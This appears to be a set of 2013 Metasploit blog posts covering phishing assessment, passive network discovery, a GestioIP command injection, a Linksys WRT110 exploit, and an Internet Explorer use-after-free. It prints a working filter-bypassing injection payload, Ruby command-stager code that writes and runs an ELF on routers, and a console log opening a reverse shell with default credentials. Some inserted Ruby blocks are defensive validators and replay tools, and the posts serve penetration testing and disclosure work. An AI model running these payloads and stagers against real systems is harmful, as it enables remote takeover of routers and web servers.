
When you're assessing the exposure to phishing in your organization, one important part are the client-side vulnerabilities that would enable a malicious attacker to exploit a browser. In this blog post, I'd like to outline a non-invasive (and free!) way to get visibility into your client-side risk landscape.

 

There are essentially two ways to use phishing as part of your security program.


  • Phish 2 Pwn: If you are a penetration tester, you'll likely use spear phishing of a couple of users to compromise a machine to gain a first foothold in the network and then pivot from there.
  • Phish 2 Educate: Phishing as part of your security program uses simulated phishes to see how many of your users would click on a link or enter credentials on a fake form.

 

Metasploit Pro offers phishing options for both Phish 2 Pwn and Phish 2 Educate. For this blog post, we'll focus on the latter. With Metasploit, you would typically set up your phishing email, containing a link to a landing page, which could be used to do any of the following:

 

  • Exploiting the browser or its plugins
  • Displaying a fake login page to harvest credentials (e.g. OWA login page)
  • Tracking click-throughs
  • Delivering security awareness training
  • Any combination of the above

 

Some phishing projects don't allow you to exploit clients, but there is a great way to determine client-side vulnerabilities using a free Rapid7 product called BrowserScan. Think of BrowserScan like Google Analytics for client-side vulnerabilities: you embed an invisible JavaScript snippet in your landing page and view the vulnerabilities in your BrowserScan dashboard. It records both browser and plugin vulnerabilities. While a vulnerability management product, such as Nexpose, can give you this kind of information about clients inside your network, BrowserScan gives you the vulnerability ratings of the machine the user actually used, such as the user's home PC.

 

Here's how you do it:

 

  1. Create your free BrowserScan account
  2. Click on Tracking and choose the Transparent badge, which is not visible when the user visits the page
  3. Embed the JavaScript code in your phishing landing page

 


 

Once you have run your phishing campaign, you'll be able to see the results of the scans in your BrowserScan Dashboard:

 


 

You can view the number of vulnerable clients overall or by a particular plugin. Here's Oracle Java by vulnerability status:

 


 

You can also see the breakdown by version number:

 


 

BrowserScan is not only limited to your phishing campaigns - you can also host it on other web pages, e.g. your intranet page or a frequently used internal web application, to get a quick, easy, and free view of your users' security posture, no matter where they may access the page from. You can even include a badge on your intranet page that gives the user instant feedback of their security posture. You may even consider this for your phishing training page:


Want to give this a try? Create your free BrowserScan account now!

Updates to the ROPDB

Hey, remember last week when we shipped that unpatched MSIE exploit?  Yeah, good times. Well, first off, it's patched now, so get yourself revved up to at least MS13-080 to protect against CVE-2013-3893. That said, the story's not quite over yet.

 

Just about a year ago, Wei sinn3r Chen and Juan Vazquez put together the Return-Oriented Programming Database, or ROPDB. This innovation provides exploit writers a fairly generic mechanism to come up with useful ROP chains from a stock of known-good DLLs.

 

Fast-forward to today. If you'll remember from sinn3r's exploit for MS13-080, the in-the-wild exploit was using an Office DLL to avoid tripping up on DEP (Data Execution Prevention) -- in other words, to skip past DEP by using a ROP chain. This week, you'll find new options for using ROP chains found in shipping versions of Office 2007 and Office 2010. Turns out, many-to-most users of Internet Explorer also tend to have a version of Office installed, so exploiting MSIE bugs by using Office's shipped version of hxds.dll is a pretty safe bet.  Incidentally, hxds.dll is a registered handler for "ms-help://" URI scheme, so it's available from MSIE-land.

 

In addition to this, the other ROP chains were reviewed and updated, so you should find some more reliability in the already-shipping chains for msfvcrt.dll and java.dll.

 

In other MSIE exploit news, you may have seen the report about another 0-day that was floating around for a month, also patched by MS13-080. The fact that it was known to vendors and some researchers to be circulating in the wild for a whole month with no fixit, no public alert, and no Metasploit module to let defenders test their defenses is a little disconcerting, but never mind all that -- we have a line on a sample for CVE-2013-3897 as well, so expect that to be released here Real Soon Now.

 

New Modules

We're shipping six new modules this week -- 5 exploits, and the one bruteforcer auxiliary module for Sentry Switched CDU. If you watch the open source diffs, you'll notice that community contributor Christian FireFart Mehlmauer apparently got sick and tired of seeing the "rport" and "peer" methods defined in about 50 different modules, and did some housekeeping. Thanks FireFart!

 

Exploit modules

 

Auxiliary and post modules

 

If you're new to Metasploit, you can get started by downloading Metasploit for Linux or Windows. If you're already tracking the bleeding-edge of Metasploit development, then these modules are but an msfupdate command away. For readers who prefer the packaged updates for Metasploit Community and Metasploit Pro, you'll be able to install the new hotness today when you check for updates through the Software Updates menu under Administration.

 

For additional details on what's changed and what's current, please see Brandont's most excellent release notes.

One of the first steps in your penetration test is to map out the network, which is usually done with an active scan. In situations where you need to be stealthy or where active scanning may cause instability in the target network, such as in SCADA environments, you can run a passive network scan to avoid detection and reduce disruptions. A passive network scan stealthily monitors broadcast traffic to identify the IP addresses of hosts on the network. By initially running a passive scan, you can identify known hosts while evading network monitoring tools, such as intrusion detection systems (IDS). The data obtained from a passive network scan can be used to perform a targeted active scan with Metasploit's Discovery Scan.

 


Metasploit Pro's Passive Network Discovery MetaModule

The Passive Network Discovery MetaModule available in Metasploit Pro runs a live packet capture on a specific network interface to capture DHCP requests and ARP requests. If you want to have more granular control over the packet capture or you want to reduce the size of the packet capture, you can use Berkeley Packet Filters (BPF) to specify the types of packets that the MetaModule captures.

 

The packet capture runs until it reaches the maximum Pcap file size or the time limit you have configured for the MetaModule. When the MetaModule run completes, it stores the captured data and generates a comprehensive report of its findings.

 

Sniffing the Network in Switched Networks

Most networks today are switched, which makes sniffing traffic harder. Unlike a hub, a switch only transmits the packets on the port of the target host instead of broadcasting it to the entire network. While this is great for minimizing traffic, it means that you'll only see packets that were meant for your machine, which defeats the point if you're trying to use network sniffing for discovering hosts on the network.

 

However, some manufacturers add ports for network analysis that show you all traffic on the switch. Depending on the manufacturer, these are called Port Mirroring, Switched Port Analyzer (SPAN), or Roving Analysis Port (RAP). Depending on your model, you may have to switch on port mirroring in the switch's settings.

 

For detailed instructions on how to use this module, check out the Passive Network Discovery MetaModule Tutorial. If you don't have Metasploit Pro, you can download a fully functional Metasploit Pro 7-day trial.

GestioIP is an open-source IPAM (IP Address Management) solution available on Sourceforge, written in Perl.

 

There is a vulnerability in the way ip_checkhost.cgi handles pinging the IPv6 hosts passed to it. If you pass an IPv4 address, the CGI uses a Perl library to perform the ping and return the results to the user.

 

However, this library doesn't seem to support IPv6 hosts, so the developer uses the ping6 utility to perform the ping of an IPv6 machine. The developer did perform some validation on the values being passed, but it wasn't sufficient and could be worked around.

 

The query string the CGI expects is

 

$QUERY_STRING =~ /ip=(.*)&hostname=(.*)&client_id=(.*)&ip_version=(.*)$/;


my $ip_ad=$1;
my $name=$2 || "";
my $client_id=$3 || "";
my $ip_version=$4 || "";
 

The first check the developer does is testing for any characters that the developer doesn't want in the query string:

 

if ( $ENV{'QUERY_STRING'} =~ /[;`'\\<>^%#*]/ ) {
        print_html($$lang_vars{max_signos_message}, $close);
        exit 1;
}
 

This presented some interesting restrictions on how to exploit the vulnerability.

 

Once the application has verified that the query string doesn't contain the bad characters (including a space, which isn't included in the previous code), the developer attempts to ensure the IP address is in the correct format.

 

if ( $ip_version eq "v4" ) {
        if ( $ip_ad !~ /^\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}$/ ) {
                print_html("<b>ERROR</b><p>$$lang_vars{ip_invalid_message}: $ip_ad","");
                exit 1;
        }
} elsif ( $ip_version eq "v6" ) {
        my $ip_ad_expand = ip_expand_address ($ip_ad,6);
        if ( $ip_ad_expand !~ /^\w+:\w+:\w+:\w+:\w+:\w+:\w+:\w+$/ ) {
                print_html("<b>ERROR</b><p>$$lang_vars{ip_invalid_message} $ip_ad","");
        }
}
 

You will notice that there is no 'else' statement, so if the ip_version param contains neither 'v4' nor 'v6', then no validation is done on the $ip_ad variable at all.

 

However, even if you were to pass in an ip_version of 'v6', the regex for the IPv6 address is not very strict at all.

 

Since an attacker can bypass any validation of the IP address before being passed to the ping6 command, the only thing left to do is figure out how to get around the first set of character restrictions.
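As an added illustration (not GestioIP's own code), the following Ruby port models the checks walked through above, then shows a strict replacement that parses the address with IPAddr, requires the family to match the declared version, and hands the result to ping as a separate argv element rather than a shell string. The function names and sample inputs are mine, and the ip_expand_address step from the original is omitted.

```ruby
require 'ipaddr'

# Characters the page's CGI rejects anywhere in the query string; the page
# notes that a space is rejected too, so it is included here.
BAD_CHARS = /[;`'\\<>^%#* ]/

# Faithful model of the original flow: no 'else' branch, so an ip_version
# other than "v4"/"v6" skips the address check entirely, and the v6 pattern
# accepts any eight colon-separated \w+ groups (address expansion omitted).
def original_check(ip_ad, ip_version)
  query = "ip=#{ip_ad}&hostname=&client_id=&ip_version=#{ip_version}"
  return :bad_chars if query.match?(BAD_CHARS)
  if ip_version == 'v4'
    return :invalid unless ip_ad.match?(/\A\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\z/)
  elsif ip_version == 'v6'
    return :invalid unless ip_ad.match?(/\A\w+:\w+:\w+:\w+:\w+:\w+:\w+:\w+\z/)
  end
  :ok
end

# Hardened replacement: let a real parser decide what an address is, insist
# that the family matches the declared version, and reject prefixes/zones.
# Returns the canonical address string, or nil when anything is off.
def strict_ip(ip_ad, ip_version)
  return nil if ip_ad.include?('/') || ip_ad.include?('%')
  addr = IPAddr.new(ip_ad)
  ok = case ip_version
       when 'v4' then addr.ipv4?
       when 'v6' then addr.ipv6?
       else false
       end
  ok ? addr.to_s : nil
rescue ArgumentError # IPAddr::InvalidAddressError and friends derive from it
  nil
end

# The actual fix for the injection: build an argv array and never go through
# a shell, so even a hostile string can only ever be one argument to ping.
def ping_argv(ip_ad, ip_version)
  addr = strict_ip(ip_ad, ip_version)
  return nil if addr.nil?
  [ip_version == 'v6' ? 'ping6' : 'ping', '-c', '1', '--', addr]
end

if __FILE__ == $PROGRAM_NAME
  # Constructed sample: a shell substitution that the bad-character filter
  # lets through, since none of $ ( ) are on the list.
  hostile = '2607:f0d0:$(id):0:0:0:0:4'
  p original_check(hostile, 'x')   # => :ok, nothing validated it
  p strict_ip(hostile, 'v6')       # => nil
  p ping_argv('2607:f0d0::4', 'v6')
end
```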

 

I ended up using a few tricks to get around the fact that I couldn't use a space or a semi-colon. I finally settled on the following IP address in the request which creates a PHP script at the root of the web application.

 

2607:f0d0:$(echo${IFS}PD9waHAKCiAgcGhwaW5mbygpOwo/Pgo=|base64${IFS}--decode|tee${IFS}phpinfo.php):0000:0000:0000:0000:0004
 

I use ${IFS} instead of a space, which bash expands to a space. I also use | to chain one command into the next, and I base64 encode my actual payload to work around the bad characters.

 

Once I figured out how to execute arbitrary commands (and figuring out my payload size couldn't be greater than about 450 characters), I knew how to write my Metasploit module:

 


 

And with that, here's the Metasploit module that exercises the vulnerability and can test if you've applied the patch correctly -- the module will be available in the next update, or if you're tracking the Metasploit development branch directly, you can simply use msfupdate to get the goods.

MSIE exploit for CVE-2013-3893

This week, you might have seen some press on our new exploit for CVE-2013-3893, some of which engages in that favorite infosec dichotomy of full disclosure vs "responsible" disclosure. First, if you want some technical details on the exploit development process used by our own Wei @_sinn3r Chen, then bop on over to his blog post on CVE-2013-3893. If you're interested in a retort to the doomsayers about our philosophy of free and open exploit dev, feel free to read on.

 

There's some concern that since Metasploit released an exploit for this unpatched vulnerability, we're "compounding" the situation, making things worse. I have to say, I kind of don't buy the reasoning behind that for a couple reasons. To start, criminal users of exploits already had the goods; while we picked up our sample about a week before publishing the exploit, there's some intelligence that suggests that this vulnerability has been part of criminal campaigns since at least early August, 2013, and quite probably earlier.

 

An exploit going mainstream in the form of a Metasploit module can have the upside benefit of raising general awareness of the bug in question. This, in turn, can put pressure on vendors to issue patches. We saw pretty much exactly that back in January: On January 11, we published an exploit for an unpatched vuln in Java, and there was similar hand-wringing about "responsible" exploit disclosure. Two days later, 7u11 was released. This kind of turnaround is exceedingly rare for Oracle. Was the availability of a Metasploit module the cause of the lickity-split patch release? You'll have to ask them, but it looks like a pretty solid cause-and-effect relationship to me. I don't know if this is going to play out exactly the same way for this MSIE bug. Microsoft does have a Fix-It available, and EMET 4.0 appears effective as well, so that does buy some time for concerned end users, but at least now it's not just bad guys who can test your end-user protection mechanisms.

 

Speaking of which, if your security posture depends on a lack of public exploits for 0-days, I have to say, you're kind of doing it wrong. "Defense in depth" is a security mantra for a reason. If your organization gets popped because of a client-side 0-day, I hope your incident response report contains some suggestions on how not to get owned the same way next time. You do have an IR plan, right? In the era of a hostile Internet, I don't think it's reasonable to rely on perfect software, nor is it reasonable to rely on limited availability of exploits where only criminals and shady government operations have access to attack tools.

 

So, I think Metasploit is pretty reasonable when we go about publishing exploits. We have a partial-secrecy disclosure policy that we stick to for what we believe to be truly unique zero-days, but when something serious is circulating on the Internet, we've found it's best for everyone to invite everyone to participate in the risk-assessment process.

 

New CMD stager for embedded devices

Okay, rant over. Let's talk about something more pleasant, like Joe Vennix's and Juan Vazquez's work on a new CMD stager for limited Linux platforms. You can read up on the vulnerability that started it and the research that followed at Juan's recent blog post. It's long, but totally worth it, and culminates in a reliable exploit for CVE-2013-3568 for Linksys routers. This work is available now in the latest Metasploit update, revolving around using plain old "echo" to construct a payload on the victim device.

 

Since this was published, we have a new, possibly even better version, that uses the shell-builtin "printf" function (common to all POSIX-compliant shells) in the form of Pull Request #2412 from community contributor Markus mwulftange Wulftange. We'll be probing the limits of this technique's portability soon, so look for it in an upcoming update.

 

Hitting up unattend.xml for passwords

Finally, I'd like to highlight a module we've landed from community contributor Ben @Meatballs__ Campbell. Turns out, when Windows is installed using a scripted installation -- which is common for many corporate environments -- the unattended "answer file" is often left behind on the installed system. This can contain lots of juicy sensitive data, not the least of which are default local administrator passwords. Ben's module makes short work of these, and honestly, checking to see if a compromised target has this trove of info should be part of any penetration testing engagement.

 

Note that clearing sensitive data is part of normal post-installation, but there are several ways this sanitization can fail, as discussed on Christopher Blake's blog, here. So, to defend against this info-leak, system administrators are advised to be on the lookout for these installation artifacts, lest they fall into the hands of your industrious local penetration tester.

 

New Modules (and much more!)

Including the four discussed above, we've got eight new modules this week, including a new exploit for Nodejs (with an accompanying "ARCH_NODEJS" payload, which is exciting), and exploits for Astium, ZeroShell, and freeFTPd. There's a ton of other exciting new fixes and content in this release I didn't get a chance to highlight as well, most notably, the fact that this update bumps Metasploit to version 4.7.1, so that means new bins for Nmap, Postgres, and updated Rails and other Ruby gems. So, your total update size is going to be bigger than usual.

 

Exploit modules

 

Auxiliary and post modules

 

If you're new to Metasploit, you can get started by downloading Metasploit for Linux or Windows. If you're already tracking the bleeding-edge of Metasploit development, then these modules are but an msfupdate command away. For readers who prefer the packaged updates for Metasploit Community and Metasploit Pro, you'll be able to install the new hotness today when you check for updates through the Software Updates menu under Administration.

 

For additional details on what's changed and what's current, please see Brandont's most excellent release notes.

Introduction

 

Earlier this summer Craig Young posted on Bugtraq about a root command injection vulnerability on the Linksys WRT110 router. This was a nice one because the request, although protected by basic authentication, is also exploitable through CSRF:

 


Our awesome Joe Vennix figured out the vulnerability and how to exploit it to get a session, even on a restricted Linux environment like the Linksys one. Since the experience can be useful for others exploiting embedded devices, here it is!

 

The Vulnerability

 

The vulnerability, a command injection, lives in the HTTP service's cgi_ping handler, reachable from the web interface. The vulnerable code gets the user-controlled "pingstr" value from the HTTP query:

 

.text:0040FFB0 loc_40FFB0:                              # CODE XREF: cgi_ping+2D8 j
.text:0040FFB0                la      $t9, atoi
.text:0040FFB4                nop
.text:0040FFB8                jalr    $t9 ; atoi
.text:0040FFBC                nop
.text:0040FFC0                lw      $gp, 0xE0+var_C8($sp)
.text:0040FFC4                nop
.text:0040FFC8                la      $a0, 0x460000
.text:0040FFCC                nop
.text:0040FFD0                addiu  $a0, (aPingstr - 0x460000)  # "pingstr"
.text:0040FFD4                move    $s0, $v0
.text:0040FFD8                la      $t9, get_cgi
.text:0040FFDC                nop
.text:0040FFE0                jalr    $t9 ; get_cgi
.text:0040FFE4                nop
.text:0040FFE8                lw      $gp, 0xE0+var_C8($sp)
.text:0040FFEC                bnez    $v0, loc_410000
 

It then builds the command line with sprintf, using the user-controlled data:

 

.text:00410000
.text:00410000 loc_410000:                              # CODE XREF: cgi_ping+328 j
.text:00410000                                          # DATA XREF: .got:10001E24 o
.text:00410000                move    $a2, $s1
.text:00410004                move    $a3, $s0 ; user controlled data from "pingstr"
.text:00410008                addiu  $a0, $sp, 0xE0+var_C0 ; store the resulting command
.text:0041000C                la      $a1, 0x460000
.text:00410010                nop
.text:00410014                addiu  $a1, (aPingFCDSDS - 0x460000)  # "ping -f -c %d -s %d %s &"
.text:00410018                sw      $v1, 0xE0+var_D0($sp)
.text:0041001C                la      $t9, sprintf
.text:00410020                nop
.text:00410024                jalr    $t9 ; sprintf
.text:00410028                nop
.text:0041002C                lw      $gp, 0xE0+var_C8($sp)
.text:00410030                b      loc_4100E8
.text:00410034
 

And finally executes it through system, making it vulnerable to command injection:

 

.text:004100E8 loc_4100E8:                              # CODE XREF: cgi_ping+36C j
.text:004100E8                la      $a0, 0x460000
.text:004100EC                nop
.text:004100F0                addiu  $a0, (aMarmotPingStrS - 0x460000)  # "marmot: ping str %s\n"
.text:004100F4                addiu  $a1, $sp, 0xE0+var_C0
.text:004100F8                la      $t9, printf
.text:004100FC                nop
.text:00410100                jalr    $t9 ; printf
.text:00410104                nop
.text:00410108                lw      $gp, 0xE0+var_C8($sp)
.text:0041010C                addiu  $a0, $sp, 0xE0+var_C0 ; The command built from user controlled data
.text:00410110                la      $t9, system
.text:00410114                nop
.text:00410118                jalr    $t9 ; system
.text:0041011C                nop
.text:00410120                lw      $gp, 0xE0+var_C8($sp)
.text:00410124
 

Unfortunately, even with the ability to execute arbitrary commands, getting a session on a Linksys WRT110 wasn't so straightforward. This was because of a very restricted BusyBox environment, lacking utilities such as wget and openssl, and daemons like telnetd. In this environment, Joe was still able to launch a stager by injecting echo commands with interpretation of backslash escapes enabled (the "-e" flag). Some of you may also find Metasploit's new CMD stager useful for exploiting other restricted Linux environments.

 

The New CMD Stager


Below we review the basics of the new stager. First of all, a new Rex::Exploitation::CmdStagerBase subclass is provided, Rex::Exploitation::CmdStagerEcho. This class takes the final payload, embeds it into an ELF file, and generates the commands needed to drop it to the filesystem, execute it and clean it up. We're going to review the most interesting methods CmdStagerEcho overrides in order to provide the new stager:


  • generate: This method is overridden to ensure opts[:temp] is a correct *nix path, and finally calls the parent method, which generates the cmd payload, including the decoding of an encoded payload, execution and cleanup commands.

 

def generate(opts = {})
  opts[:temp] = opts[:temp] || '/tmp/'
  opts[:temp].gsub!(/\\/, "/")
  opts[:temp] = opts[:temp].shellescape
  opts[:temp] << '/' if opts[:temp][-1,1] != '/'
  super
end
 

  • generate_cmds: This method is overridden to set the extra byte count (so the encoded payload is split correctly), and to set the start/end strings that wrap every part of the encoded payload in a command.

 

def generate_cmds(opts)
  @cmd_start = "echo -en "
  @cmd_end  = ">>#{@tempdir}#{@var_elf}"
  xtra_len = @cmd_start.length + @cmd_end.length + 1
  opts.merge!({ :extra => xtra_len })
  super
end
 

  • encode_payload: This method must be overridden in order to encode the payload if necessary. In this case, the String containing the ELF with the payload must be encoded into the "\\x55\\xAA" hex format that echo understands when interpretation of backslash escapes is enabled.

 

def encode_payload(opts)
  return Rex::Text.to_hex(@exe, "\\\\x")
end

  • slice_up_payload: This method takes a string of data (the encoded payload) and turns it into an array of usable pieces (parts), which is how limits on the length of the executed command are worked around. It must be overridden because, in this stager, the representation of a hex byte cannot be split across two parts:

 

def slice_up_payload(encoded, opts)
  encoded_dup = encoded.dup


  parts = []
  xtra_len = opts[:extra]
  xtra_len ||= 0
  while (encoded_dup.length > 0)
    temp = encoded_dup.slice(0, (opts[:linemax] - xtra_len))
    # cut the end of the part until we reach the start
    # of a full byte representation "\\xYZ"
    while (temp.length > 0 && temp[-5, 3] != "\\\\x")
      temp.chop!
    end
    parts << temp
    encoded_dup.slice!(0, temp.length)
  end


  parts
end
  • parts_to_commands: This method combines the parts of the encoded file with the stuff that goes before / after it, in order to generate every command:

 

def parts_to_commands(parts, opts)
  cmds = []
  parts.each do |p|
    cmd = ''
    cmd << @cmd_start
    cmd << p
    cmd << @cmd_end
    cmds << cmd
  end

  cmds
end
 

  • generate_cmds_decoder: since there is no decoding task in this stager (echo with the "-e" flag allows writing binary contents to the file directly), this method is overridden just to provide the commands necessary to chmod and execute the dropped binary payload, and then optionally delete it after executing:

 

def generate_cmds_decoder(opts)
  cmds = []
  # Make it all happen
  cmds << "chmod +x #{@tempdir}#{@var_elf}"
  cmds << "#{@tempdir}#{@var_elf}"

  # Clean up after unless requested not to..
  if (not opts[:nodelete])
    cmds << "rm -f #{@tempdir}#{@var_elf}"
  end

  return cmds
end
 

Once the new Rex class is ready, the next step is to provide a new Exploit mixin so modules for command injection vulnerabilities can easily use it to get a new session. In order to provide a new CmdStager mixin, it should include the CmdStager interface, define a create_stager method, and override any other methods if necessary. In this case, just defining create_stager to return a new Rex::Exploitation::CmdStagerEcho instance is all that is needed:

 

####
# Allows for staging cmd to arbitrary payloads through the CmdStagerEcho.
#
# This stager uses the echo's "-e" flag, that enable interpretation of
# backslash escapes, to drop an ELF with the payload embedded to disk.
# The "-e" flag is usually available on linux environments. This stager
# has been found useful on restricted linux based embedded devices.
####

module Exploit::CmdStagerEcho

  include Msf::Exploit::CmdStager

  # Initializes a CmdStagerEcho instance for the supplied payload
  #
  # @param exe [String] The payload embedded into an ELF
  # @return [Rex::Exploitation::CmdStagerEcho] Stager instance
  def create_stager(exe)
    Rex::Exploitation::CmdStagerEcho.new(exe)
  end
end
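To tie the methods above together, here is a small stand-alone Ruby model (added here, not the framework's code) of the encode, slice and command-generation steps, plus a replay routine that rebuilds the dropped file from the generated commands, which is also how you would reconstruct a staged binary from logged HTTP requests during incident response. The class and method names, the /tmp/payload path and the sample bytes are constructed for the example.

```ruby
# Model of CmdStagerEcho's encode -> slice -> commands pipeline (hypothetical
# names; not Metasploit's code), with a replay step to verify the pieces.
class EchoStagerModel
  BYTE_REPR = '\\\\x' # the three characters \\x, as in the page's to_hex call

  attr_reader :cmd_start, :cmd_end, :target

  def initialize(data, linemax:, tempdir: '/tmp/', var_elf: 'payload')
    @data = data.b
    @linemax = linemax
    @target = "#{tempdir}#{var_elf}"
    @cmd_start = 'echo -en '
    @cmd_end = ">>#{@target}"
  end

  # encode_payload: every byte becomes \\xHH. The backslash is doubled because
  # the word reaches echo unquoted, so the shell consumes one backslash first.
  def encode_payload
    @data.each_byte.map { |b| format('%s%02x', BYTE_REPR, b) }.join
  end

  # slice_up_payload: cut at linemax minus the per-command overhead, then chop
  # back until the piece ends on a complete 5-character \\xHH unit.
  def slice_up_payload(encoded)
    extra = @cmd_start.length + @cmd_end.length + 1
    chunk = @linemax - extra
    raise ArgumentError, 'linemax leaves no room for a single byte' if chunk < 5
    parts = []
    rest = encoded.dup
    until rest.empty?
      temp = rest.slice(0, chunk)
      temp.chop! while temp.length > 0 && temp[-5, 3] != BYTE_REPR
      parts << temp
      rest.slice!(0, temp.length)
    end
    parts
  end

  # parts_to_commands + generate_cmds_decoder: one echo per part appending to
  # the file, then chmod, execute and (the page's default) delete.
  def commands
    cmds = slice_up_payload(encode_payload).map { |p| cmd_start + p + cmd_end }
    cmds << "chmod +x #{target}"
    cmds << target
    cmds << "rm -f #{target}"
  end

  # Reconstruct the bytes the echo commands would write. Two escape layers are
  # undone in order: the shell folds \\ into \, then echo -e maps \xHH to a
  # byte. Commands that are not echo appends are ignored.
  def self.replay(cmds, cmd_start, cmd_end)
    out = ''.b
    cmds.each do |c|
      next unless c.start_with?(cmd_start) && c.end_with?(cmd_end)
      word = c[cmd_start.length...(c.length - cmd_end.length)].b
      after_shell = word.gsub('\\\\') { '\\' }
      out << after_shell.gsub(/\\x([0-9a-fA-F]{2})/) { Regexp.last_match(1).hex.chr }
    end
    out
  end
end

# Constructed sample: an ELF-like header followed by bytes that are awkward in
# a shell command line (NUL, 0xff, newline, quotes, dollar sign).
SAMPLE = "\x7fELF".b + [0x01, 0x01, 0x01, 0x00, 0xff, 0x0a, 0x27, 0x22, 0x24].pack('C*')

if __FILE__ == $PROGRAM_NAME
  stager = EchoStagerModel.new(SAMPLE, linemax: 60)
  stager.commands.each { |c| puts c }
end
```

With linemax 60 the 13 sample bytes (65 encoded characters) split into a 35- and a 30-character part, and replaying the commands yields exactly the original bytes.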
 

Getting shells

 

At this point, an exploit can take advantage of the new CMD stager by including the new mixin (Msf::Exploit::CmdStagerEcho), calling execute_cmdstager from the exploit method, and defining the execute_command method. This method should execute an arbitrary command through the exploited vulnerability. In the CVE-2013-3568 case, an HTTP POST request with the command injection in the 'pingstr' variable is sent:

 

# Run the command on the router
def execute_command(cmd, opts)
  send_request_cgi({
    'uri' => '/ping.cgi',
    'method' => 'POST',
    'vars_post' => {
      'pingstr' => '& ' + cmd
    }
  })
end
 

Finally, time to enjoy shells!

 

msf exploit(linksys_wrt110_cmd_exec_stager) > show options

Module options (exploit/linux/http/linksys_wrt110_cmd_exec_stager):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   PASSWORD  admin            no        Password to login with
   Proxies                    no        Use a proxy chain
   RHOST     192.168.1.1      yes       The address of the router
   RPORT     80               yes       The target port
   TIMEOUT   20               no        The timeout to use in every request
   USERNAME  admin            yes       Valid router administrator username
   VHOST                      no        HTTP server virtual host


Payload options (linux/mipsle/shell_reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.1.100    yes       The listen address
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Linux mipsel Payload


msf exploit(linksys_wrt110_cmd_exec_stager) > rexploit
[*] Reloading module...

[*] Started reverse handler on 192.168.1.100:4444 
[*] 192.168.1.1:80 - Trying to login with admin:admin
[+] 192.168.1.1:80 - Successful login admin:admin
[*] Command Stager progress -  90.69% done (2046/2256 bytes)
[*] Command shell session 1 opened (192.168.1.100:4444 -> 192.168.1.1:32771) at 2013-09-16 14:41:48 -0500

[*] Command Stager progress - 100.00% done (2256/2256 bytes)

ls
AdminDiag.htm
AdminManage.htm
AdminRebootConfig_Clicked.htm
AdminRebootConfig_Clicked_reboot.htm
AdminReport.htm
AdminRestore.htm
AdminRouting.htm
AdminUpgrade.htm
AdminUpgradeFail.htm
AdminUploadConfigFail.htm
AdvancedWirelessSettings.htm
AppDDNS.htm
AppDDNSDYN.htm
AppDDNSDYN_msg.htm
AppDDNSTZO.htm
AppDDNSTZO_msg.htm
AppDDNSURL.htm
AppDMZ.htm
AppDMZDHCPClientTable.htm
.
.
.

 

Want to try this out for yourself? Get your free Metasploit download now or update your existing installation, and let us know if you have any further questions or comments.

Recently the public has shown a lot of interest in the new Internet Explorer vulnerability (CVE-2013-3893) that has been exploited in the wild, which was initially discovered in Japan. At the time of this writing there is still no patch available, but there is at least a temporary Fix-It from Microsoft that you can apply, which can be downloaded here.

 

The nitty gritty

 

We started noticing CVE-2013-3893 almost two weeks ago, but during that time we couldn't find a sample of it, so I asked publicly, and waited. Luckily our Metasploit contributor @binjo found a sample on Jsunpack, and was kind enough to share that information with me. Since this bug has been going on for a while, plus I'm releasing a Metasploit module for it, there's no point in hiding it, so here you go. If you want a cleaner version of the trigger for debugging purposes, you can get it here. A brief technical writeup about the bug can be found on Microsoft's TechNet Blog here.

 

The vulnerability affects Internet Explorer from 6 all the way to 11, however, the exploit in the wild primarily targets Internet Explorer 8 on Windows XP, and Internet Explorer 8 and 9 on Windows 7. This part is a little confusing, because there's more to it:

 

For IE8 on XP, the exploit fingerprints regions such as English, Chinese (including Taiwan, Hong Kong, China, Singapore), French, German, Japanese, Portuguese, Korean, and Russian. However, it is only tweaked for English, Chinese, Japanese, and Korean, which makes sense because XP is still pretty popular in Asian countries. This also means a portion of the fingerprinting code seems to be junk, and appears to be reused since at least 2012, as this malicious MS12-037 code indicates. Perhaps these exploits are from the same exploit pack with the same library, I don't know for sure.

 

Windows 7 targets don't seem to have this language restriction. Instead, the exploit would try against any Windows 7 machines (IE8/IE9) as long as Office 2007 or Office 2010 is installed.  This is because the Microsoft Office Help Data Services Module (hxds.dll) can be loaded in IE, and is required to leverage Return-Oriented Programming in order to bypass DEP and ASLR, and gain arbitrary code execution. The fingerprinting code for Office is also reused.

 

Hopefully the above clarifies who the targets are. However, I should also remind everyone again that the vulnerability affects IE 6/7/8/9/10/11. So at any moment this exploit can be improved to target more users around the world, if it hasn't been already.

 

 

"If you build it, nerds will come"

 

The Metasploit module can currently only be tested on Internet Explorer 9 on Windows 7 SP1 with either Office 2007 or Office 2010 installed, as the following screenshots demonstrate:

 

ie_setmousecapture_uaf firing against IE 9 on Windows 7 SP1 with Microsoft Office 2007:


 

ie_setmousecapture_uaf firing against IE 9 on Windows 7 SP1 with Microsoft Office 2010:


 

 

Go Ninja!

 

The CVE-2013-3893 exploit can be obtained by using the msfupdate utility in Metasploit Framework, and feel free to fire up that bad boy. If you are on Metasploit Pro, this exploit is expected to go to the upcoming update, and you can check this through the Software Updates menu under Administration. If you are new to Metasploit, you can get started by downloading the software here.

 

Update

 

Oct 8th 2013 - Security update MS13-080 is available.

Let's Curbstomp Windows!

This week, we've got two new exploits for everyone's favorite punching bag, Microsoft Windows. First up, we'll take on Microsoft Internet Explorer. MSIE has a long and storied history of browser bugs, but truth be told, they're really pretty hard to exploit reliably these days. If you don't believe me, take a look at the hoops we had to jump through to get reliable exploits together for MS13-069.

 

MS13-069 was released on September 10, 2013 to address at least 10 vulnerabilities, one of them being CVE-2013-2305. This is the "Caret Use-After-Free" vulnerability, discovered and reported to Microsoft by friend of the show, corelanc0d3r. This module, written by Wei sinn3r Chen, is pretty well commented and, for extra points, uses a custom ROP chain. So, if you're looking to start your stylish and dangerous career as an MSIE bug hunter, you could do worse than to study the notes on this module.

 

The other Windows exploit is for MS13-071, which patched the Windows Theme system for Windows versions prior to Windows 7. This module is particularly neat because while it's a file format exploit, it comes with the option of firing up your own UNC server from within Metasploit. This was written by The World's Friendliest Exploit Dev, Juan Vazquez, and he discusses the path to remote code execution in detail in his blog post.

 

Serving up file format exploits over a temporary SMB share point is pretty new (and requires you to run Metasploit as root on a non-Windows system, like Kali Linux), so it's only supported in this module on an experimental basis. If this kind of thing turns out to be useful, we can look at promoting the code involved to the SMB server mixin proper, as well as getting a better WebDAV server running as well.

 

